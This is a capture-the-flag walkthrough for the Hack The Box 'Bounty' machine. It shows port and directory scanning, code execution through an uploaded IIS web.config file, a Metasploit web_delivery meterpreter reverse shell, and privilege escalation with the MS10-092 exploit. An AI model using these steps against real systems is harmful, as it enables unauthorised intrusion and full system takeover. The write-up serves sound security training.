Hack The Box: Bounty

Difficulty: Eazy
Machine Creator: mrb3n
Tools Used:


Task: To find User.txt and Root.txt
Network Enumeration

Let’s start with a simple NMAP scan to discover open ports and services.

nmap -A

From the NMAP scan, we can see port 80 HTTP server running Microsoft IIS 7.5.

Browsing the website on this server, we see a single image of a wizard.


Using Gobuster, we can perform a directory scan. This host is a windows IIS server so we can add the extensions of .aspx,.html.

gobuster -u -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40 -x .aspx,.html

The Gobuster results show an aspx file and a directory named uploadedfiles.

The transfer.aspx page appears to gives us the ability to upload a file.

When I try to upload a file, I’m just getting an error.

Remote Code Execution (RCE)

After a little research, we may be able to upload a web.config file and perform some remote code execution. This example will test adding 1+2.

I was able to upload the new web.config file successfully.

Success the remote code execution is returning the results of 3.


Since we can upload a web.config file, we should be able to upload a web shell in the config file.

I’ve replaced the configuration section of the web.config file with the web shell code.

The web shell config file uploaded successfully, and now we have a surface to exploit.

Web Delivery Meterperter Shell

We need to build our exploit from Metasploit using the web delivery script.

msf use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) set srvhost
msf exploit(multi/script/web_delivery) set target 2
msf exploit(multi/script/web_delivery) set payload window/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) set lhost
msf exploit(multi/script/web_delivery) run

The output of the exploit gives us a PowerShell command that we can use on the RCE page.

Meterperter Shell

Success after running the PowerShell script from the web shell page we now have a meterperter shell running as user bounty\merlin.


Our shell as Merlin we can read the user.txt on merlin’s desktop.

Privilege Escalation

Now we need to get system level session to get the root.txt we can use the recon local_exploit_suggester module in Metasploit.

msf use post/multi/recon/local_exploit_suggester
msf set session 2
msf run

After running the exploit suggester, it appears that this machine may be vulnerable to MS10_092.

Privilege Escalation Exploit

After running exploit ms10_092_schelevator, we now have a new meterperter session.

System-level meterperter shell.


As system, we can now read the contents of root.txt.